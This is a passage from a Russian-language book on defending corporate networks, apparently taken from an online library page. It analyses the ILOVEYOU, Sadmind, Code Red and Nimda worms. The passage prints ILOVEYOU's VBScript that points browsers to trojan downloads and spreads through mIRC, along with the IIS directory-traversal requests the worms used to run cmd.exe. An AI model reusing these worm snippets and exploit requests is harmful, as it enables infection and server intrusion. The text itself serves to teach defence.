Защита от хакеров корпоративных сетей
Шрифт:
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate “HKCU\Software\Microsoft\Internet Explorer\Main\
Start Page”,http://www.skyinet.net/~young1s/
HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbv
YT/WIN-BUGSFIX.exe
elseif num = 2 then
regcreate “HKCU\Software\Microsoft\Internet Explorer\Main\
Start Page”,http://www.skyinet.net/~angelcat/
skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbm
KLJKjhkqj4w/WIN-BUGSFIX.exe
elseif num = 3 then
regcreate “HKCU\Software\Microsoft\Internet Explorer\Main\
Start Page”,http://www.skyinet.net/~koichi/
jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WINBUGSFIX.
exe
elseif num = 4 then
regcreate “HKCU\Software\Microsoft\Internet Explorer\Main\
Start Page”,http://www.skyinet.net/~chu/
sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjas
fdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WINBUGSFIX.
exe
end if
end ifПрограмма WIN-BUGSFIX.exe является Троянским конем, предназначенным для похищения чужих паролей. А все адреса находятся на сайте www.skyinet.net.
Кроме того, если бы создатели сайта skyinet.net были умнее, они бы заменили Троянскую программу WIN-BUGSFIX.exe приложением для борьбы с I love you, которое действительно уничтожает этого червя. Таким образом, они привели бы в действие Троянского коня для Троянского коня.
Червь I love you, кроме всего прочего, вносит изменения в конфигурационные файлы приложения mIRC, которое является популярным IRC-клиентом для Windows:if (s=“mirc32.exe”) or (s=“mlink32.exe”) or (s=“mirc.ini”)
or (s=“script.ini”) or (s=“mirc.hlp”) then
set scriptini=fso.CreateTextFile(folderspec&“\script.ini”)
scriptini.WriteLine “[script]”
scriptini.WriteLine “;mIRC Script”
scriptini.WriteLine “; Please dont edit this script... mIRC
will corrupt, if mIRC will”
scriptini.WriteLine “ corrupt... WINDOWS will affect and
will not run correctly. thanks”
scriptini.WriteLine “;”
scriptini.WriteLine “;Khaled Mardam-Bey”
scriptini.WriteLine “;http://www.mirc.com”
scriptini.WriteLine “;”
scriptini.WriteLine “n0=on 1:JOIN:#:{”
scriptini.WriteLine “n1= /if ( $nick == $me ) { halt }”
scriptini.WriteLine “n2= /.dcc send $nick
“&dirsystem&”\LOVE-LETTER-FOR-YOU.HTM”
scriptini.WriteLine “n3=}”
scriptini.closeВнесенные изменения заставляют mIRC-клиента посылать копию червя I love you всем, кто присоединяется к каналу, по которому общается пользователь зараженного компьютера. Разумеется, имя посылаемого файла должно быть достаточно соблазнительным, чтобы пользователь, присоединившийся к каналу, захотел его открыть. Думаю, что название «LOVE-LETTER-FOR-YOU.HTM» («Любовное письмо для вас») вряд ли заинтересует кого-нибудь, кроме одиноких людей, а вот заголовки «Top-10-reasons-why-irc-sucks.htm» («10 основных причин, по которым IRC вызывает отвращение») или «irc-channel-passwords.htm» («Пароли для IRC-каналов»), скорее всего, будут популярны.
Червь Sadmind
Червь Sadmind появился в мае 2001 года. Его уникальность заключалась в способности заражать как узлы Sun Solaris, так и узлы Microsoft IIS. Этот червь начал свое путешествие с поиска систем Solaris с уязвимой версией сервиса RPC (Remote Procedure Call – удаленный вызов процедуры). Данный сервис поставляется вместе с системой Solaris версий от 2.4 до 7. Найдя уязвимый компьютер, червяк использовал переполнение буфера, чтобы получить доступ к системе с полномочиями привилегированного пользователя. Затем он осуществлял следующие действия:
• заменял входящий порт для сервиса remote shell на порт 600;
• установливал различные двоичные файлы в папку /dev/cuc/ и создавал системные журналы в папке /dev/cub/. В число этих двоичных файлов входят grabbb, sadmin.sh и uniattack.sh;
• атаковал серверы IIS, используя уязвимость обработки Unicode. Запросы, формируемые червем, выглядят следующим образом:
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/
c+dir+..\
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+
copy+\winnt\system32\cmd.exe+root.exe
GET /scripts/root.exe?/c+echo+<HTML code inserted
here>.././index.asp• ну и напоследок червь менял код HTML-страниц, находящихся на сервере IIS, вписывая туда следующие строки:
fuck USA Government
fuck PoizonBOx
contact:sysadmcn@yahoo.com.cnХотя распространение червя Sadmind было достаточно заметным, его не сравнить с настоящими эпидемиями появившихся позднее червей (о них мы поговорим чуть позже). В конце концов, уязвимое место, через которое Sadmind проникал в систему, было закрыто два года назад! Однако червь до сих пор распространяется, потому что многие администраторы за эти два года так и не установили пакеты обновления системы.
Черви Code Red
18 июня 2001 года фирма eEye Digital Security (www.eeye.com) известила общественность об обнаруженной уязвимости, которая могла привести к переполнению буфера в Web-сервере Microsoft IIS при обработке. IDA-файлов. Коротко говоря, переполнение буфера может возникнуть при обработке длинных запросов URL, координируемых приложением Indexing Service ISAPI, которое обычно работает с запросами. IDA. Специальным образом сконструированный запрос URL вызывает переполнение буфера этого приложения и позволяет выполнить произвольный код, используя удаленный доступ.
А 17 июля фирма eEye проинформировала о появлении Интернет-червя, использующего переполнение буфера. IDA. Они провели восстановление исходного кода червя, чтобы понять принцип его устройства. Вот что было обнаружено:
• червь запускает 99 своих процессов (нитей), которые используются для поиска новых серверов-мишеней;
• запускается дополнительный процесс, который заменяет Web-страницы зараженного сервера на страницу, на которой написано «Welcome toHacked By Chinese!» (Добро пожаловать на сайтвзломанный китайцами);
• 20 числа каждого месяца червь отправляет большое количество информации на сайт www.whitehouse.gov, осуществляя распределенную атаку, приводящую к отказу в обслуживании.
Полный
Чтобы сделать жизнь владельцев компьютеров еще более интересной, 4 августа была выпущена новая версия этого червя, которая называлась Code Red II, так как механизм заражения (переполнение буфера. IDA) остался неизменным. Впрочем, результат воздействия нового червя выглядел несколько иначе:
• количество процессов, запускаемых для поиска уязвимых серверов, достигало 300;
• копирование файлаcmd.exe в файлы \inetpub\scripts\root.exe и \progra~1\ common~1\system\MSADC\root.exe приводит к тому, что этот файл становится доступным для удаленной атаки через Интернет;
• Троянская программа устанавливается по адресу c: \explorer.exe. Она выключает систему защиты файлов в Windows, а затем отображает диски C: и D: в папки /c и /d в корневой папке сервера IIS. В результате с удаленного компьютера можно получить полный доступ к этим дискам. Троянская программа наблюдает за состоянием дисков и воссоздает их каждые 10 мин.
Полный анализ червя Code Red II находится на сайте www.eeye.com/html/Research/Advisories/AL20010804.html. Еще раз отметим, что черви Code Red зависят от переполнения буфера IIS. А ведь для борьбы с этим видом уязвимости фирма Microsoft выпустила пакет исправлений еще в июне 2001 года. Из этого факта можно сделать вывод, что подавляющее большинство пользователей Интернета обычно пренебрегают обновлением своих систем.
Червь Nimda
В сентябре 2001 года, когда последствия эпидемии червей Code Red еще не были устранены, возник очередной представитель этого вида. Червь Nimda (название представляет собой слово admin, написанное задом наперед), также носящий имя Concept Virus, является очередным представителем группы червей, распространяющихся через сайты Microsoft. Вот методы, которые он использует для инфицирования.
Червь рассылает себя по электронной почте, присоединяясь в виде файлов. EXE. Однако при этом используется тип вложения audio/x-wave MIME, эксплуатирующий такой недостаток браузера Internet Explorer и почтового клиента Outlook, как автоматическое выполнение присоединенных файлов во время просмотра электронной почты. После выполнения червь рассылает себя по адресам, найденным в адресной книге пользователя и обнаруженным в кэше приложения Internet Explorer. Последнее означает, что червь собирает адреса электронной почты, опубликованные на Web-страницах, которые недавно посетил пользователь инфицированного компьютера!
Червь ищет уязвимые IIS-машины, во-первых, просматривая файлы root.exe, оставшиеся после червей Code Red II и Sadmind, а во-вторых, используя различные трюки с перекодированием Unicode и двойной перекодировкой URL, позволяющие выполнять команды на стороне сервера. Вот список выполняемых червем запросов:GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/
cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/
cmd.exe?/c+dir
GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../
..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dirОбнаружив уязвимый IIS-сервер, червь пытается передать на него свой код, используя протокол tftp. Затем на этом сервере создается гостевая учетная запись, которая добавляется в группу администраторов. Таким способом червь получает доступ к скрытому сетевому диску C$. Червь модифицирует все локальные HTML– и ASP-файлы, добавляя к ним следующий кусок кода:
<script language=“JavaScript”>
window.open(“readme.eml”, null,
“resizable=no,top=6000,left=6000”)
</script>Кроме того, червь копируется в файл readme.eml. В результате ничего не подозревающие пользователи Интернета автоматически загружают и, вполне возможно, запускают на выполнение червей с инфицированных сайтов.
Червь копирует себя также в файлы форматов. EML и. NWS, находящиеся в локальных и сетевых папках. Попытки открыть папки с этими файлами приводят к тому, что функция автоматического предварительного просмотра приложения Windows Explorer активирует код червя. Этот способ используется для распространения червя по локальной сети.
Ну и, наконец, червь копирует себя в файл riched.dll, пытаясь присоединиться к документам Microsoft Office. Ведь эти документы открываются в той же самой папке, в которой бинарный файл riched.dll загрузит и выполнит зараженный Троянской программой DLL.
В итоге получился очень заметный, но в то же время и весьма эффективный червь. Его присутствие сразу обращает на себя внимание, так как в локальной системе появляются многочисленные файлы. EML и. NWS. Этот червь самостоятельно распространяется по уязвимым серверам. Метод множественного заражения в очередной раз доказал свою эффективность. Многие пользователи, распознавшие и удалившие червя, обнаруживали, что их система все равно продолжает инфицироваться, ведь полностью уничтожить червя не так-то просто! Для полноценной борьбы с этой напастью нужно установить на сервер IIS соответствующий пакет исправлений от Microsoft, обновить клиента Microsoft Outlook, а впоследствии осторожно использовать сетевые ресурсы общего доступа.
Полная информация по червю Nimda доступна в документах группы «компьютерной скорой помощи» – CERT – по адресу www.cert.org/advisories/CA-2001-26.html, а также в анализе от SecurityFocus на сайте aris.securityfocus.com/alerts/nimda/010921-Analysis-Nimda-v2.pdf.Мир-о-творец
8. Помещик
Фантастика:
альтернативная история
рейтинг книги
Виконт. Книга 4. Колонист
Псевдоним `Испанец`
Фантастика:
фэнтези
попаданцы
аниме
рейтинг книги
Титан империи
1. Титан Империи
Фантастика:
фэнтези
попаданцы
аниме
рейтинг книги
Запретный Мир
1. Запретный Мир
Фантастика:
фэнтези
героическая фантастика
рейтинг книги
